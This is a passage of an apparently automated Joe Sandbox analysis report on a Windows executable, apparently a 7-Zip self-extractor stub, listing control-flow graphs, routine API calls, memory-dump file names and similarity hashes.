                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 1799206407-0
                                              • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                              • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                              • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                              • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                              APIs
                                              • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                              • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: DiskFreeMessageSendSpace
                                              • String ID:
                                              • API String ID: 696007252-0
                                              • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                              • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                              • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                              • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                              • String ID: HpA
                                              • API String ID: 801014965-2938899866
                                              • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                              • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                              • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                              • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                              • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                              • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                              • DispatchMessageW.USER32(?), ref: 00401B89
                                              • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                              • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                              • String ID: Static
                                              • API String ID: 2479445380-2272013587
                                              • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                              • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                              • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                              • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                              APIs
                                              • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                              • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@memcpymemmove
                                              • String ID:
                                              • API String ID: 3549172513-3916222277
                                              • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                              • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                              • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                              • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 851 4033f8-4033fa 838->851 852 403419-40341b 839->852 853 40340a-403417 call 407776 839->853 840->831 847 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->847 848 40347f-40348a 841->848 844->837 849 4033b6 844->849 864 4034bc-4034c0 847->864 848->847 854 40348c-403490 848->854 849->835 858 40349c-4034a5 ??3@YAXPAX@Z 851->858 855 40346b-403475 ??3@YAXPAX@Z 852->855 856 40341d-40343c memcpy 852->856 853->851 854->847 860 403492-403497 854->860 855->864 862 403451-403455 856->862 863 40343e 856->863 858->864 860->847 861 403499-40349b 860->861 861->858 867 403440-403448 862->867 868 403457-403464 call 401986 862->868 866 403450 863->866 866->862 867->868 869 40344a-40344e 867->869 868->853 872 403466-403469 868->872 869->866 869->868 872->855 872->856
                                              APIs
                                              • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                              • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                              • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                              • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                              • String ID:
                                              • API String ID: 846840743-0
                                              • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                              • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                              • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                              • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                              • wsprintfW.USER32 ref: 004044A7
                                                • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                              • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                              • String ID: 7zSfxFolder%02d$IA
                                              • API String ID: 3387708999-1317665167
                                              • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                              • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                              • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                              • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 925 408f26 923->925 926 408f19-408f24 923->926 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 925->927 926->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 944 409199-4091b0 935->944 945 409019-40901c 935->945 939 409020-409035 call 40e8da call 40874d 936->939 965 408fb0-408fb2 937->965 966 408fb6-408fbb 937->966 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 944->952 953 40934c-409367 call 4087ea 944->953 945->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 970 4090ad-4090b3 955->970 971 40907f 955->971 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 963 409051-409061 call 408726 958->963 959->963 987 409063-409066 963->987 988 409068 963->988 965->966 968 408fc3-408fcf 966->968 969 408fbd-408fbf 966->969 968->922 968->923 969->968 981 409187-409196 call 408e83 970->981 982 4090b9-4090d9 call 40d94b 970->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 971->977 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->970 1016 409261-409264 978->1016 1017 4092c9 978->1017 985 4091f7-409209 979->985 986 4092b9-4092bb 979->986 981->944 997 4090de-4090e6 982->997 999 4093a4-4093b8 call 408761 983->999 1000 4093ba-4093d6 983->1000 1013 409293-409295 985->1013 1014 40920f-409211 985->1014 1001 4092bf-4092c4 986->1001 994 40906a 987->994 988->994 994->955 1005 409283-409288 997->1005 1006 4090ec-4090f3 997->1006 999->1000 1080 4093d7 call 40ce70 1000->1080 1081 4093d7 call 40f160 1000->1081 1001->977 1011 409290 1005->1011 1012 40928a-40928c 1005->1012 1007 409121-409124 1006->1007 1008 4090f5-4090f9 1006->1008 1022 4092b2-4092b7 1007->1022 1023 40912a-409138 call 408726 1007->1023 1008->1007 1018 4090fb-4090fe 1008->1018 1011->1013 1012->1011 1025 409297-409299 1013->1025 1026 40929d-4092a0 1013->1026 1014->978 1024 409213-409215 1014->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->986 1022->1001 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1049 409281 1027->1049 1028->1046 1050 409114-40911f call 40d6cb 1028->1050 1029->1001 1041 4092ac-4092ae 1029->1041 1036 4092d4-4092e0 call 408a55 1030->1036 1037 40931d-409346 call 40e959 * 2 1030->1037 1057 4092e2-4092ec 1036->1057 1058 4092ee-4092fa call 408aa0 1036->1058 1037->953 1037->957 1041->1022 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1049->1030 1050->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1065 409165-409167 1060->1065 1066 40916b-409170 1060->1066 1063->1036 1063->1037 1065->1066 1071 409172-409174 1066->1071 1072 409178-409181 1066->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                              • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID: IA$IA
                                              • API String ID: 1033339047-1400641299
                                              • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                              • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                              • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                              • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: $KA$4KA$HKA$\KA
                                              • API String ID: 1294909896-3316857779
                                              • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                              • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                              • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                              • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1120 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1120 1121 40983c-409846 call 409425 1112->1121 1113->1114 1116 409780-409796 call 4094e0 call 40969d call 40e959 1114->1116 1117 4097a3-4097a8 1114->1117 1137 40979b-4097a1 1116->1137 1118 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1117->1118 1119 4097aa-4097b4 1117->1119 1124 4097f3-409809 1118->1124 1119->1118 1119->1124 1133 409881-40989a call 4010e2 call 40eb24 1120->1133 1134 409878-40987f call 40ebf7 1120->1134 1144 40984a-40984c 1121->1144 1129 40980c-409814 1124->1129 1136 409816-409825 call 409403 1129->1136 1129->1137 1153 40989d-4098c0 call 40eb19 1133->1153 1134->1133 1136->1129 1137->1109 1144->1110 1157 4098c2-4098c7 1153->1157 1158 4098f6-4098f9 1153->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1163 409954 1159->1163 1164 40994b-409952 call 409c13 1159->1164 1165 409902-409904 1160->1165 1166 409908-40991e call 409530 call 409425 1160->1166 1161->1162 1179 4098e9-4098eb 1162->1179 1180 4098ef-4098f1 1162->1180 1170 409956-40996d call 4010e2 1163->1170 1164->1170 1165->1166 1166->1159 1181 40997b-4099a0 call 409fb4 1170->1181 1182 40996f-409978 1170->1182 1179->1180 1180->1110 1186 4099a2-4099a7 1181->1186 1187 4099e3-4099e6 1181->1187 1182->1181 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1153 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1225 409aa2-409aa4 1213->1225 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1222 409a73-409a75 1218->1222 1223 409a79-409a91 call 409530 call 409425 1218->1223 1219->1213 1220->1195 1224 409adf-409ae5 1220->1224 1222->1223 1223->1144 1233 409a97-409a9d 1223->1233 1224->1195 1228 409aa6-409aa8 1225->1228 1229 409aac-409ab0 1225->1229 1228->1229 1229->1195 1233->1144
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004096D0
                                              • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                              • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
